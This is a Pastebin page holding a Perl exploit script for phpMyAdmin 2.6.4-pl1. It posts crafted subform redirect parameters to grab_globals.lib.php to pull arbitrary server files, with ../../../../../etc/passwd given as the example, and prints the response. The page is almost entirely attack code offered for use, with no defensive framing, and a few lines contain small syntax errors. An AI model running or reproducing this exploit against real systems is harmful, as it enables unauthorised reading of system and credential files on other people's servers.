Advertisement
FlyFar

phpMyAdmin 2.6.4-pl1 simple exploit

Jul 19th, 2023
1,979
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Perl 1.26 KB | Cybersecurity | 0 0
  1. #!/usr/bin/perl
  2. use IO::Socket;
  3. # simple exploit phpMyAdmin 2.6.4-pl1
  4.  
  5. if (@ARGV < 3)
  6. {
  7. print "usage: perl phpmyadmin-2.6.4-pl1.pl HOST /DIR/ FILE\r\n\r\n";
  8. print "HOST - Host where is phpmyadmin example: http://localhost\r\n";
  9. print "DIR - Directory to PMA example: /phpMyAdmin-2.6.4-pl1/\r\n";
  10. print "FILE - file to inclusion ../../../../../etc/passwd\r\n\r\n";
  11. print "example: perl phpmyadmin-2.6.4-pl1.pl http://localhost /phpMyAdmin-2.6.4-pl1/ ../../../../../etc/passwd\r\n\r\n";
  12. exit();
  13. }
  14.  
  15. $HOST = $ARGV[0];
  16. $DIR = $ARGV[1]."libraries/grab_globals.lib.php";
  17. $FILE = "usesubform[1]=1&usesubform[2]=1&subform[1][redirect]=". $ARGV[2]. "&subform[1][cXIb8O3]=1";
  18. $LENGTH = length $FILE;
  19.  
  20. print "\r\nATTACK HOST IS: ".$HOST."\r\n\r\n";
  21. $HOST =~ s/(http:\/\/)//;
  22. $get1 = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$HOST", PeerPort => "80") die "Error 404\r\n\r\n";
  23. print $get1 "POST ".$DIR." HTTP/1.0\n";
  24. print $get1 "Host: ".%HOST."\n";
  25. print $get1 "Content-Type: application/x-www-form-urlencoded\n";
  26. print $get1 "Content-Length: ".$LENGTH."\n\n";
  27. print $get1 $FILE;
  28.  
  29. while ($odp = <$get1>)
  30. {
  31. if ($odp =~ /<b>Warning<\/b>: main\(\): Unable to access .\/$ARGV[2] in <b>/ ) {
  32. printf "\n\nFile ".$ARGV[2]." no exists.\r\n\r\n";
  33. exit;
  34. }
  35.  
  36. printf $odp;
  37. }
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement